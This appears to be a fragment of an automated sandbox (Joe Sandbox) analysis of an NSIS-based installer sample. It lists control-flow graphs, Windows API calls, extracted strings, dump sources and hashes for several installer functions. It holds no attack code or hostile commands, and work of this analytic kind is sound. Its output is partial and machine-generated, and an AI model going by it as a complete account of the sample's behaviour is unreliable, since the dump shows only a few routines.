                                                                                                                                                                                                                                                                            control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                              • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                            • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                            • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                            • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                            • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                            • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                            • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                                                                                                                                            Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,%MxBearing%,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,%MxBearing%,%MxBearing%,00000000,00000000,%MxBearing%,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                            • String ID: %MxBearing%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                                                                                                                                                                                            • API String ID: 4286501637-3689784668
                                                                                                                                                                                                                                                                            • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                            • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                                                                                                                                            Function 004035B3 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                            • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                            • u+, xrefs: 00403632
                                                                                                                                                                                                                                                                            • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                            • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                            • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$u+
                                                                                                                                                                                                                                                                            • API String ID: 4283519449-3463419070
                                                                                                                                                                                                                                                                            • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                            • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                                                                                                                                                            Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00424179,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                            • String ID: (]C$... %d%%$pAB$yAB
                                                                                                                                                                                                                                                                            • API String ID: 651206458-2023174797
                                                                                                                                                                                                                                                                            • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                            • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                                                                                                                                            Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00445D80,00424179,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                            • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                                                                                                                                                            Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                            • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                            • String ID: %MxBearing%$Exch: stack < %d elements$Pop: stack empty
                                                                                                                                                                                                                                                                            • API String ID: 1459762280-4223719792
                                                                                                                                                                                                                                                                            • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                            • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                                                                                                            Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

